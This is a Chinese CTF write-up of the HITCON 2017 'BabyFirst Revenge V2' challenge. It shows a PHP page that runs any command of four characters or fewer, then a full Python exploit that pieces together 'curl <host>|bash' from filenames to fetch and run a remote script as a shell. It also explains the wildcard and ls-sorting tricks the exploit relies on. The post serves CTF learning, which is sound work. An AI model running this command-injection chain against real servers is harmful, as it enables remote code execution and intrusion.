[hitcon2017] BabyFirst Revenge V2复现

分享本题自制Dockerfile:Github

这题相比于上一题 条件更加的苛刻了 只允许执行最多四个字符
源码如下:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

那我们之前的生成 ls -t>g 就不能按照最后一步 ls>>_ 来执行了

但是我们能不能还是按照 生成命令段文件 最后通过ls来拼接命令执行呢?

这里还是以分析Orange大大的exp为主:

Exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl orange.tw|python;"
    # generate "curl 10.188.2.20|bash"
    '>\;\\', 
    '>sh\\', 
    '>ba\\', 
    '>\|\\', 
    '>20\\', 
    '>2.\\',
    '>8.\\', 
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
    print i
    sleep(0.1)

首先生成 ls -t >g的命令文件,这里orange大大的方法真的巧妙到极致了!

  • 先了解一个小trick,*在Linux中代表的是0或多个字符,比如ls *.txt 就表示了列出本目录下所有后缀名为txt的文件,那假如单独执行一个*会是什么效果?
    在本地尝试了一下 直接输入一个星号的话Linux首先会把当前目录下的所有文件按字典序排序一次,然后将排序的结果当作命令执行,如下:
    🌰

    那下图的也可以理解了:
    🌰

    因为*o匹配了 echo 和o,而他们的排序是echo在前,o在后 所以就会执行命令 echo o
  • 再认识一下dir 这个命令在大多数系统中都是ls 的alias 但是有些系统中则没有
    为什么我们要用这个命令呢 因为之前说过ls 是alphabetically (字典序)那么dir就会排在ls结果的最前面 所以我们*之后dir也是排在最前面 也就充当了拼接文件名的角色

  • 大概思路就出来了 我们要构造ls -t>g的命令片段成几个文件名 但是其命令段的首字母不能在d的前面,也就是不能是 特殊符号 数字 abc 而且每一段不能超过两个字符,因为其余两个字符要分配给>和\,如果你尝试一下构造 正常来说是没办法构造出无特殊符号打头的文件名 他总会排到dir的前面,然后更巧妙的地方来了 我们可以生成逆序的命令拼接起来,最后使用rev命令反向文件中的字符串!

  • 根据之前我们对*的认识,我们可以将倒序的命令输入到v文件中,因为*v能匹配rev 和 v,也就是执行了 rev v命令,然后再将倒序之后的结果>x文件中,这样*v>x刚刚好是四个字符!

  • 但是看到这里 你可能还会在尝试过程中发现问题,那就是逆序之后的命令段应该是 [dir,>sl,>g>,>t-] 那么这里会有一个问题 因为t的字母序比s后,所以ls之后应该是这样的:


    Oops

    解决方法是加多一个参数h,在ls中h是用作格式化l参数之后的存储量大小 使之更适合人类方式阅读 但是如果ls只带参数h的不带参数l话那这个参数是毫无意义的 如图:


    🌰

    所以我们将>t-改成>ht-就能解决字典序的问题了
  • 接下来的问题就回到了babyfirst-revenge的情况了

参考:
https://github.com/orangetw/My-CTF-Web-Challenges

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,064评论 5 466
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,606评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,011评论 0 328
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,550评论 1 269
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,465评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 47,919评论 1 275
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,428评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,075评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,208评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,185评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,191评论 1 328
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,914评论 3 316
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,482评论 3 302
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,585评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,825评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,194评论 2 344
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,703评论 2 339

推荐阅读更多精彩内容